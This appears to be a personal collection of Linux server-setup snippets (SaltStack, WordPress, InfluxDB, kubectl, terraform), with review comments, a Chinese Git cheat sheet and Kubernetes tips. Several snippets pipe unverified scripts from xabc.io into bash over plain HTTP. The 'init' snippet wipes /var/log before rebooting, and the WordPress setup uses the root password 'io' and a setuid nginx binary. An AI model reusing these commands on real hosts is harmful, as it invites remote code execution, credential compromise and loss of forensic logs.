c1 curl -s xabc.io/b|bash curl -s xabc.io/v|bash timedatectl set-timezone Asia/Shanghai yum -y install epel-release yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync [ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local hostnamectl --static set-hostname central-44.192.95.161; systemctl disable firewalld yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum clean expire-cache yum -y install salt-master yum -y install salt-minion yum -y install salt-ssh pip3 install redis flask cryptography pyinotify systemctl enable iptables.service systemctl enable salt-master.service [ -d /srv/salt ]||mkdir -p /srv/salt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/iptables -O /etc/sysconfig/iptables wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/master -O /etc/salt/master systemctl restart salt-master.service [ -d /srv/zero/0 ]||mkdir -p /srv/zero/0 [ -d /srv/zero/1 ]||mkdir -p /srv/zero/1 [ -d /srv/zero/2 ]||mkdir -p /srv/zero/2 [ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1 wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2
# wordpress: installs PHP 7 with php-fpm, a MariaDB (RedHat family) or MySQL
# (Debian family) server, creates a "wordpress" database, downloads php-fpm,
# MySQL, rc.local and nginx configuration files, unpacks an OpenResty build
# and WordPress under /opt, and starts nginx if it is not already running.
# NOTE(review): the database root password is the two-character literal 'io'
# (set in the RedHat branch, passed as `mysql -pio` in the Debian branch).
# Replace it with a generated secret before any deployment; a password on the
# mysql command line is also visible in the process list.
# NOTE(review): `apt-get -y install mysql-server --allow-unauthenticated` lets
# apt install packages whose signatures cannot be verified.
# NOTE(review): rc.local, the start script, the configuration files and the
# tarballs are fetched from a storage bucket and used as root with no digest
# check, and `chmod +xs` sets the setuid and setgid bits on the root-owned
# nginx binary.
wordpress cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null if [ "$OS" = "RedHat" ] then yum -y install yum-utils yum -y install epel-release yum -y install vim wget bzip2 unzip rsync yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo yum -y install MariaDB-server MariaDB-client yum -y install php72w yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo systemctl start mariadb [ -d /etc/rc.d ]||mkdir -p /etc/rc.d [ -d /etc/php-fpm.d ]||mkdir -p /etc/php-fpm.d wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/RedHat-php.conf -O /etc/php-fpm.d/www.conf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-rc.local.conf -O /etc/rc.d/rc.local wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/mysql-server.cnf -O /etc/my.cnf.d/server.cnf chmod 755 /etc/rc.d/rc.local mysql <<- EOF set password for root@localhost=password('io'); create database wordpress; EOF systemctl restart mariadb systemctl restart php-fpm systemctl enable mariadb systemctl enable php-fpm fi if [ "$OS" = "Debian" ] then apt-get -y update apt-get -y install vim wget bzip2 unzip rsync apt-get -y remove apache2 apt-get -y install php7.[0-9] apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc apt-get -y install mysql-server --allow-unauthenticated mysql -pio<<- EOF create database wordpress; EOF wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/Debian-php.conf -O `find 
/etc/php/ -name www.conf` wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-rc.local.conf -O /etc/rc.local chmod 755 /etc/rc.local systemctl restart mysql /etc/init.d/php*-fpm restart fi [ -d /opt/sys ]||mkdir -p /opt/sys [ -d /var/log/php-fpm ]||mkdir -p /var/log/php-fpm [ -d /var/log/mariadb ]||mkdir -p /var/log/mariadb wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-nginx.conf -O /opt/openresty/nginx/conf/nginx.conf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress.tgz -O -|tar xzf - -C /opt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-start.sh -O /opt/sys/wordpress-start.sh chown -R nobody.nobody /opt/openresty chown -R nobody.nobody /opt/wordpress chown root.nobody /opt/openresty/nginx/sbin/nginx chmod +xs /opt/openresty/nginx/sbin/nginx chmod 700 /opt/sys/wordpress-start.sh pgrep nginx||/opt/openresty/nginx/sbin/nginx
base cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install epel-release yum -y install bash-completion yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang yum -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools bind-utils telnet openssh-clients pcre openssl fi if [ "$OS" = "Debian" ];then apt-get -y update apt-get -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential clang apt-get -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools dnsutils telnet fi
influxdb echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" INFLUXDB_VER=1.7.8 if [ "$OS" = "RedHat" ] then yum -y install yum-utils yum -y localinstall https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/influxdb-${INFLUXDB_VER}.x86_64.rpm wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/file/influxdb.repo -O /etc/yum.repos.d/influxdb.repo fi if [ "$OS" = "Debian" ] then wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/influxdb_${INFLUXDB_VER}_amd64.deb dpkg -i influxdb_${INFLUXDB_VER}_amd64.deb rm -f influxdb_${INFLUXDB_VER}_amd64.deb fi
# init: updates all packages with yum, runs the xabc.io "a" and "k" scripts by
# piping curl output into bash, deletes /var/log and recreates it empty, then
# reboots.
# NOTE(review): both URLs carry no scheme, so curl fetches them over plain
# HTTP and bash runs whatever arrives, including a modified or truncated
# response.
# NOTE(review): `rm -rf /var/log` removes all existing logs together with the
# subdirectories (and their ownership and modes) that services expect to find
# there. Anything that happened on the host before this point can no longer
# be reconstructed from local logs; ship or archive logs first if they may be
# needed for an investigation.
init yum update -y curl -s xabc.io/a|bash curl -s xabc.io/k|bash rm -rf /var/log;mkdir -p /var/log reboot
g salt \* saltutil.sync_grains
istio echo doing... wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/istio/istio.tgz -O -|tar xzf - -C /opt wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/istio/xabc-istio.sh -O /etc/profile.d/xabc-istio.sh echo /opt/istio
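# dep: download the golang/dep install script and run it with bash.
# The script is downloaded completely (curl -f fails on an HTTP error) before
# anything executes, so a dropped connection never leaves bash running half a
# script as `curl ... | bash` can.
# NOTE(review): the URL tracks the repository's master branch, so the content
# can change between runs. Pin a commit in the URL and compare the file with
# a digest recorded at review time, e.g.
#   echo "<EXPECTED_SHA256_PLACEHOLDER>  $script" | sha256sum -c - || exit 1
(
  script=$(mktemp) || exit 1
  trap 'rm -f -- "$script"' EXIT
  curl -f https://raw.githubusercontent.com/golang/dep/master/install.sh -o "$script" || exit 1
  bash "$script"
)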
go wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/go.tgz -O -|tar xzf - -C /usr/local wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/xabc-go.sh -O /etc/profile.d/xabc-go.sh
# to: follow access.log and print only the lines whose second field is
# greater than 2.
# NOTE(review): presumably the second field is $request_time from the nginx
# log_format used elsewhere on this page, i.e. requests slower than two
# seconds; confirm against the format of the log being read.
tail -f access.log |
  awk '$2 > 2'
# y: print the first private (RFC 1918) IPv4 address configured on this host.
# Lines containing "lo " are skipped, the text between "inet " and the prefix
# slash is extracted, and only 10/8, 172.16/12 and 192.168/16 addresses are
# kept.
ip -o -f inet addr |
  grep -v 'lo ' |
  grep -Po '(?<=inet ).*(?=\/)' |
  grep -E '^10\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.' |
  head -n 1
# h: print "<OS family> <CPU count> <memory in GiB>" for this host.
# OS is "Debian" or "RedHat" (the second test wins when both match), CPU is
# the number of /proc/cpuinfo lines containing "processor", and MEM is the
# total reported by free with one GiB added before truncating to an integer.
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi
CPU=$(grep -c "processor" /proc/cpuinfo)
MEM=$(free | awk '/Mem/ {print int(($2+1048576)/1048576)}')
echo "$OS $CPU $MEM"
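# busybox: install a busybox binary from the xabc bucket to
# /usr/local/bin/busybox.
# The file is downloaded to a temporary path and only installed (mode 755)
# when the download succeeds. Previously `wget -O` wrote straight to the
# destination, so a failed transfer left an empty or partial file there that
# was then marked executable.
# NOTE(review): this places an unverified binary on root's PATH. Compare it
# with a digest obtained out of band before installing, e.g.
#   echo "<EXPECTED_SHA256_PLACEHOLDER>  $tmp_bin" | sha256sum -c - || exit 1
mkdir -p /usr/local/bin
tmp_bin=$(mktemp) || exit 1
if wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/busybox -O "$tmp_bin"; then
  install -m 755 "$tmp_bin" /usr/local/bin/busybox
else
  echo "busybox: download failed; nothing installed" >&2
fi
rm -f -- "$tmp_bin"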
# pycurl: builds curl 7.43.0 from a tarball in /tmp/build, installs it under
# /usr/local, moves the distribution's /usr/lib64/libcurl.so.4* into /tmp,
# symlinks the self-built library in their place, then installs pycurl with
# pip3.
# NOTE(review): after this runs, every program on the host that links
# libcurl.so.4 (not only pycurl) uses the self-built 7.43.0 library, a release
# from 2015 that no longer receives the distribution's security updates. The
# original libraries are parked in /tmp, where they may be cleaned up
# automatically. Building pycurl against the distribution's libcurl
# development package avoids replacing the system library.
# NOTE(review): /tmp/build is a fixed path in a world-writable directory and
# the tarball is not checked against a digest.
pycurl mkdir -p /tmp/build&&cd /tmp/build wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/curl-7.43.0.tar.gz -O -|tar xzf - cd curl-7.43.0 ./configure make && make install mv /usr/lib64/libcurl.so.4* /tmp/ ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4.3.0 ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4 pip3 install pycurl
# q: free disk space taken by logs. First deletes empty *.log files older than
# seven days anywhere outside /proc, /sys, /etc and /boot. Then, under the
# seven largest top-level directories (du excludes proc, etc, sys, boot, run
# and mnt), prints and truncates to zero length every *.log file except
# .xabc.log, .usercmd.log, usercmd.log and .sys.log, plus anything named
# catalina.out.
# NOTE(review): in the second find, `-o -name "catalina.out"` binds more
# loosely than the implicit -a between the other tests, so the -type f test
# and the name exclusions apply only to the *.log alternative. The $(find ...)
# result is word-split, so a path containing whitespace is truncated under the
# wrong names.
# NOTE(review): truncation discards application and system log content
# outright. Where logs may be needed for incident investigation, rotate or
# ship them off-host before running this.
q echo doing... find / -empty -mtime +7 ! -path "/proc/*" -a ! -path "/sys/*" -a ! -path "/etc/*" ! -path "/boot/*" -type f -a -name "*.log" -delete for i in $(find `du -s /* --exclude={proc,etc,sys,boot,run,mnt}|sort -nr|head -7|awk '{print $2}'|tr '\n' ' '` -type f -a -name "*.log" ! -name ".xabc.log" ! -name ".usercmd.log" ! -name "usercmd.log" ! -name ".sys.log" -o -name "catalina.out");do echo $i;> $i;done
pandas import pandas as pd pd.set_option('display.max_rows', 10000) #最大行数 pd.set_option('display.max_columns', 1000) #最大列数 pd.set_option('display.width', 10000) #页面宽度
call pip3 install aliyun-python-sdk-core pip3 install aliyun-python-sdk-dyvmsapi
# tcp: count TCP connections per state. For every netstat line that starts
# with "tcp", the last field (the connection state) is tallied, and each state
# is printed with its count. A sudden rise in one state (e.g. many half-open
# or closing connections) is a quick first signal when triaging load or a
# suspected flood.
netstat -n |
  awk '
    /^tcp/ { count[$NF]++ }
    END { for (state in count) print state, count[state] }
  '
# sh: install vim and bash-completion with the platform package manager, then
# download xabc_bash.sh into /etc/profile.d.
# NOTE(review): files in /etc/profile.d are sourced by login shells of every
# user, root included, so the downloaded script runs with each user's
# privileges at every login. It is fetched with no digest check; review it and
# pin a known-good copy.
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
# Checked second, so it wins when both patterns match.
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi
case "$OS" in
  RedHat)
    yum -q -y install vim bash-completion
    ;;
  Debian)
    apt-get -q -y install vim bash-completion
    ;;
esac
curl -s -L -o /etc/profile.d/xabc_bash.sh \
  https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/xabc_bash.sh
git git clone https://gitlab.glority.cn/operation/matrix-build.git ./build (clone 到指定目录) 整理的常用 Git 命令清单。几个专用名词的译名如下。 Workspace:工作区 Index / Stage:暂存区 Repository:仓库区(或本地仓库) Remote:远程仓库 当你修复完线上问题,切回 feature 分支,想恢复代码也只需要:git stash apply 相关命令# 保存当前未commit的代码 git stash # 保存当前未commit的代码并添加备注 git stash save "备注的内容" # 列出stash的所有记录 git stash list # 删除stash的所有记录 git stash clear # 应用最近一次的stash git stash apply # 应用最近一次的stash,随后删除该记录 git stash pop # 删除最近的一次stash git stash drop 一、新建代码库 在当前目录新建一个Git代码库 $ git init 新建一个目录,将其初始化为Git代码库 $ git init [project-name] 下载一个项目和它的整个代码历史 $ git clone [url] 二、配置 Git的设置文件为.gitconfig,它可以在用户主目录下(全局配置),也可以在项目目录下(项目配置)。 #显示当前的Git配置 $ git config --list #编辑Git配置文件 $ git config -e [–global] #设置提交代码时的用户信息 $ git config [–global] user.name “[name]” $ git config [–global] user.email “[email address]” 三、增加/删除文件 #添加指定文件到暂存区 $ git add [file1] [file2] … #添加指定目录到暂存区,包括子目录 $ git add [dir] #添加当前目录的所有文件到暂存区 $ git add . #添加每个变化前,都会要求确认 # 对于同一个文件的多处变化,可以实现分次提交 $ git add -p #删除工作区文件,并且将这次删除放入暂存区 $ git rm [file1] [file2] … #停止追踪指定文件,但该文件会保留在工作区 $ git rm --cached [file] #改名文件,并且将这个改名放入暂存区 $ git mv [file-original] [file-renamed] 四、代码提交 #提交暂存区到仓库区 $ git commit -m [message] #提交暂存区的指定文件到仓库区 $ git commit [file1] [file2] … -m [message] #提交工作区自上次commit之后的变化,直接到仓库区 $ git commit -a #提交时显示所有diff信息 $ git commit -v #使用一次新的commit,替代上一次提交 # 如果代码没有任何新变化,则用来改写上一次commit的提交信息 $ git commit --amend -m [message] #重做上一次commit,并包括指定文件的新变化 $ git commit --amend [file1] [file2] … 五、分支 #列出所有本地分支 $ git branch #列出所有远程分支 $ git branch -r #列出所有本地分支和远程分支 $ git branch -a #新建一个分支,但依然停留在当前分支 $ git branch [branch-name] #新建一个分支,并切换到该分支 $ git checkout -b [branch] #新建一个分支,指向指定commit $ git branch [branch] [commit] #新建一个分支,与指定的远程分支建立追踪关系 $ git branch --track [branch] [remote-branch] #切换到指定分支,并更新工作区 $ git checkout [branch-name] #切换到上一个分支 $ git checkout - #建立追踪关系,在现有分支与指定的远程分支之间 $ git branch --set-upstream [branch] [remote-branch] #合并指定分支到当前分支 $ git merge [branch] #选择一个commit,合并进当前分支 $ git cherry-pick [commit] 
#删除分支 $ git branch -d [branch-name] #删除远程分支 $ git push origin --delete [branch-name] $ git branch -dr [remote/branch] 六、标签 #列出所有tag $ git tag #新建一个tag在当前commit $ git tag [tag] #新建一个tag在指定commit $ git tag [tag] [commit] #删除本地tag $ git tag -d [tag] #删除远程tag $ git push origin :refs/tags/[tagName] #查看tag信息 $ git show [tag] #提交指定tag $ git push [remote] [tag] #提交所有tag $ git push [remote] --tags #新建一个分支,指向某个tag $ git checkout -b [branch] [tag] git tag -a 2020-07-08 -m '2020-07-08' git push 2020-07-08 七、查看信息 #显示有变更的文件 $ git status #显示当前分支的版本历史 $ git log #显示commit历史,以及每次commit发生变更的文件 $ git log --stat #搜索提交历史,根据关键词 $ git log -S [keyword] #显示某个commit之后的所有变动,每个commit占据一行 $ git log [tag] HEAD --pretty=format:%s #显示某个commit之后的所有变动,其"提交说明"必须符合搜索条件 $ git log [tag] HEAD --grep feature #显示某个文件的版本历史,包括文件改名 $ git log --follow [file] $ git whatchanged [file] #显示指定文件相关的每一次diff $ git log -p [file] #显示过去5次提交 $ git log -5 --pretty --oneline #显示所有提交过的用户,按提交次数排序 $ git shortlog -sn #显示指定文件是什么人在什么时间修改过 $ git blame [file] #显示暂存区和工作区的差异 $ git diff #显示暂存区和上一个commit的差异 $ git diff --cached [file] #显示工作区与当前分支最新commit之间的差异 $ git diff HEAD #显示两次提交之间的差异 $ git diff [first-branch]…[second-branch] #显示今天你写了多少行代码 $ git diff --shortstat “@{0 day ago}” #显示某次提交的元数据和内容变化 $ git show [commit] #显示某次提交发生变化的文件 $ git show --name-only [commit] #显示某次提交时,某个文件的内容 $ git show [commit]:[filename] #显示当前分支的最近几次提交 $ git reflog 八、远程同步 #下载远程仓库的所有变动 $ git fetch [remote] #显示所有远程仓库 $ git remote -v #显示某个远程仓库的信息 $ git remote show [remote] #增加一个新的远程仓库,并命名 $ git remote add [shortname] [url] #取回远程仓库的变化,并与本地分支合并 $ git pull [remote] [branch] #上传本地指定分支到远程仓库 $ git push [remote] [branch] #强行推送当前分支到远程仓库,即使有冲突 $ git push [remote] --force #推送所有分支到远程仓库 $ git push [remote] --all 九、撤销 #恢复暂存区的指定文件到工作区 $ git checkout [file] #恢复某个commit的指定文件到暂存区和工作区 $ git checkout [commit] [file] #恢复暂存区的所有文件到工作区 $ git checkout . 
#重置暂存区的指定文件,与上一次commit保持一致,但工作区不变 $ git reset [file] #重置暂存区与工作区,与上一次commit保持一致 $ git reset --hard #重置当前分支的指针为指定commit,同时重置暂存区,但工作区不变 $ git reset [commit] #重置当前分支的HEAD为指定commit,同时重置暂存区和工作区,与指定commit一致 $ git reset --hard [commit] #重置当前HEAD为指定commit,但保持暂存区和工作区不变 $ git reset --keep [commit] #新建一个commit,用来撤销指定commit # 后者的所有变化都将被前者抵消,并且应用到当前分支 $ git revert [commit] #暂时将未提交的变化移除,稍后再移入 $ git stash $ git stash pop 十、其他 #查看远程分支和本地分支的对应关系 $git remote show origin #从本地删除远程已经删除的分支的tracking(在issue被merge之后,远程分支会被删除,那么相应的本地tracking我们也可以删除掉) $git remote prune origin #从本地删除远程已经删除的分支(merge后可以执行此操作保持工作区的清洁) $git fetch -p && for branch in `git branch -vv | grep ': gone]' | awk '{print $1}'`; do git branch -D $branch; done #生成一个可供发布的压缩包 $ git archive
# snippet: b
# Installs the baseline admin toolset with the distribution's package manager.
# OS keeps whatever value it already had when neither probe matches; the
# RedHat probe runs second, so it wins when both patterns are present.
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi

case "$OS" in
  RedHat)
    yum -y install vim wget bzip2 unzip rsync psmisc net-tools bind-utils telnet bash-completion
    ;;
  Debian)
    apt-get -y install vim wget bzip2 unzip rsync psmisc net-tools dnsutils telnet
    ;;
esac
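# snippet: aliyunexporter
# Installs aliyun-exporter, then forces werkzeug back to 0.16.1.
pip3 install aliyun-exporter
# -y: without it pip stops at a confirmation prompt; when the snippet is fed to
# the shell on stdin, that prompt would consume the script lines that follow.
pip3 uninstall -y werkzeug
pip3 install -U PyYAML
# NOTE(review): the pin is presumably for aliyun-exporter compatibility. It also
# holds werkzeug at an old release, so re-check it whenever the exporter is upgraded.
pip3 install werkzeug==0.16.1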
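# snippet: tools
# Installs the extended toolset (git, tmux, inotify-tools, jq, ...) with the
# distribution's package manager. The RedHat probe runs second and therefore
# wins when both patterns match.
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi

case "$OS" in
  RedHat)
    yum -y install vim wget bzip2 unzip rsync bash-completion git tmux inotify-tools axel jq
    ;;
  Debian)
    # The subcommand must be spelled "install"; apt-get rejects anything else
    # and the Debian branch would install nothing.
    apt-get -y install vim wget bzip2 unzip rsync git tmux inotify-tools luajit jq
    ;;
esac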
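# snippet: upx
# Installs the upx binary from the download bucket into /usr/local/bin.
# The transfer is staged in a temp file and curl runs with -f, so an HTTP error
# page or a truncated download never ends up as an executable on PATH.
# Set UPX_SHA256 to the expected digest to have it verified before installing.
upx_tmp=$(mktemp) &&
  curl -f https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/upx -o "$upx_tmp" &&
  { [ -z "${UPX_SHA256:-}" ] ||
    printf '%s  %s\n' "$UPX_SHA256" "$upx_tmp" | sha256sum -c --quiet -; } &&
  install -m 0755 "$upx_tmp" /usr/local/bin/upx
[ -n "$upx_tmp" ] && rm -f -- "$upx_tmp"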
# snippet: uninstall
# Placeholder: the RedHat branch calls `yum -y erase` without package names and
# the Debian branch only prints "hello".
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi

case "$OS" in
  RedHat) yum -y erase ;;
  Debian) echo hello ;;
esac
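# snippet: kubectl
# kubectl edit deployment filelist -n htdz   (view the template of the filelist deployment)
#curl -LO https://dl.k8s.io/release/v1.21.0/bin/linux/amd64/kubectl
#curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl
#
# Installs kubectl from the mirror bucket. The binary is staged in a temp file,
# so a failed transfer cannot leave an empty or partial executable in place.
# The mirror does not state which release it serves; set KUBECTL_SHA256 to the
# digest of the release you expect (upstream publishes a kubectl.sha256 next to
# each binary on dl.k8s.io) to have it verified before installing.
kubectl_tmp=$(mktemp) &&
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/kubectl -O "$kubectl_tmp" &&
  { [ -z "${KUBECTL_SHA256:-}" ] ||
    printf '%s  %s\n' "$KUBECTL_SHA256" "$kubectl_tmp" | sha256sum -c --quiet -; } &&
  install -m 0755 "$kubectl_tmp" /usr/local/bin/kubectl
[ -n "$kubectl_tmp" ] && rm -f -- "$kubectl_tmp"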
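# snippet: ki
# Installs the ki command and its shell profile hook.
# -f makes curl fail on an HTTP error instead of saving the error page as the
# script. zki.sh goes into /etc/profile.d, so every login shell on the host
# sources it, root's included.
curl -fsLo /usr/local/bin/ki https://r2.xabc.io/ki.py
curl -fsLo /etc/profile.d/zki.sh https://r2.xabc.io/zki.sh
chmod 755 /usr/local/bin/ki
# Message: "log out and back in, then try the `ki` command".
printf "\033[1;32m%s\033[0m\n" "退出终端重新登录,输入指令 # ki 试试看"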
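# snippet: kompose
# Installs kompose from the mirror bucket. The binary is staged in a temp file,
# so a failed transfer cannot leave an empty or partial executable in place.
# Set KOMPOSE_SHA256 to the expected digest to have it verified before installing.
kompose_tmp=$(mktemp) &&
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/kompose -O "$kompose_tmp" &&
  { [ -z "${KOMPOSE_SHA256:-}" ] ||
    printf '%s  %s\n' "$KOMPOSE_SHA256" "$kompose_tmp" | sha256sum -c --quiet -; } &&
  install -m 0755 "$kompose_tmp" /usr/local/bin/kompose
[ -n "$kompose_tmp" ] && rm -f -- "$kompose_tmp"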
# snippet: v
# Streams vim.tgz from the bucket and unpacks it into the invoking user's home.
# NOTE(review): tar writes whatever paths the archive holds relative to ~, so
# the archive can replace any dotfile there; list it first (tar tzf) when the
# bucket is not under your own control.
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/vim.tgz -O - |
  tar -xzf - -C ~
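# snippet: tf
# Installs terraform from the mirror bucket and registers shell completion.
# The binary is staged in a temp file, so a failed transfer cannot leave an
# empty or partial executable in place; completion is only registered after a
# successful install. Set TERRAFORM_SHA256 to the expected digest to have it
# verified before installing.
tf_tmp=$(mktemp) &&
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/terraform/terraform -O "$tf_tmp" &&
  { [ -z "${TERRAFORM_SHA256:-}" ] ||
    printf '%s  %s\n' "$TERRAFORM_SHA256" "$tf_tmp" | sha256sum -c --quiet -; } &&
  install -m 0755 "$tf_tmp" /usr/local/bin/terraform &&
  /usr/local/bin/terraform -install-autocomplete
[ -n "$tf_tmp" ] && rm -f -- "$tf_tmp"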
# snippet: t
# Prints the first IPv4 address of this host that falls in a private range
# (10.x, 172.16-31.x, 192.168.x); prints nothing when there is none.
ip addr | awk '
  /inet / {
    sub(/\/.*/, "", $2)                      # drop the /prefix-length
    if ($2 ~ /^(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)/) {
      print $2
      exit                                   # first match only
    }
  }'
ao netstat -ao
n hostnamectl --static set-hostname
k8stips 1.当将线上kubernetes宿主机的ARP参数都改大后,再也没有出现过此类问题了。 sysctl -w net.ipv4.neigh.default.gc_thresh3=32768 sysctl -w net.ipv4.neigh.default.gc_thresh2=16384 sysctl -w net.ipv4.neigh.default.gc_thresh1=8192 2.K8S故障排查指南- but volume paths are still present on disk 1.上面错误信息可以通过 journalctl -u kubelet -f 或者 tail -f /var/log/messages 命令查看到。 2. # 查看 etc-hosts 文件中 pod name 名称 $ cat /var/lib/kubelet/pods/9e6d9bdd-1554-45e6-8831-53e83f8ea263/etc-hosts # 删除 9e6d9bdd-1554-45e6-8831-53e83f8ea263 目录 $ cd /var/lib/kubelet/pods/ $ rm -rf 9e6d9bdd-1554-45e6-8831-53e83f8ea263 3. 现在在通过 journalctl -u kubelet -f 命令看kubelet日志,就没有 Orphaned pod found - but volume paths are still present on disk 报错了。 3.走flannel的vxlan网络,vxlan需要放开udp/8472 4. 下面配置意味着单个负载会调度到一个剩余CPU request大于0.1核,剩余request内存大于200MB的节点,并且负载运行时的CPU使用率不能高于0.4核(超过将被限流),内存使用不多余300MB(超过将被OOM Kill并重启) resources: requests: memory: 200Mi cpu: "0.1" limits: memory: 300Mi cpu: "0.4" 5. 使用 kubectl 来创建 TLS Secret 时,你可以像下面的例子一样使用 tls 子命令: kubectl create secret tls my-tls-secret --cert=path/to/cert/file --key=path/to/key/file # 镜像字体 fonts-dejavu # /etc/sysctl.d/k8s.conf ( 确保 pod 之间 IP 互通) net.bridge.bridge-nf-call-ip6tables = 1 net.ipv4.ip_forward = 1 net.bridge.bridge-nf-call-iptables = 1 6. kubectl get pod --field-selector=status.phase==Running 7. immutable: true ( 不可更改的 secret / configmap ) 8. 
访问某pod的某个容器: kubectl --namespace=default exec -it user-deployment-54469dd57-vg87g --container user -- sh # kubectl scale deploy -n --replicas=1 --all 可以用用scale指令修改指定命名空间下所有的deploy的副本数量。 #设置k8s预留资源保护 #/etc/systemd/system/kubelet.service.d/10-kubeadm.conf #Environment="KUBELET_CUSTOMIZED_ARGS1=--eviction-hard=imagefs.available<15%,memory.available<2Gi,nodefs.available<10%,nodefs.inodesFree<5% --system-reserved=memory=1Gi --kube-reserved=memory=400Mi --kube-reserved=pid=1000 --system-reserved=pid=1000" # systemctl daemon-reload;systemctl restart kubelet (重启kubelet 生效) #ingress配置增加注解(annotations):nginx.ingress.kubernetes.io/ssl-redirect: 'true' 就可以实现http强制跳转至https #deployment imagePullPolicy: IfNotPresent 1.简述Kubernetes中Pod可能位于的状态? Pending:API Server已经创建该Pod,且Pod内还有一个或多个容器的镜像没有创建,包括正在下载镜像的过程。 Running:Pod内所有容器均已创建,且至少有一个容器处于运行状态、正在启动状态或正在重启状态。 Succeeded:Pod内所有容器均成功执行退出,且不会重启。 Failed:Pod内所有容器均已退出,但至少有一个容器退出为失败状态。 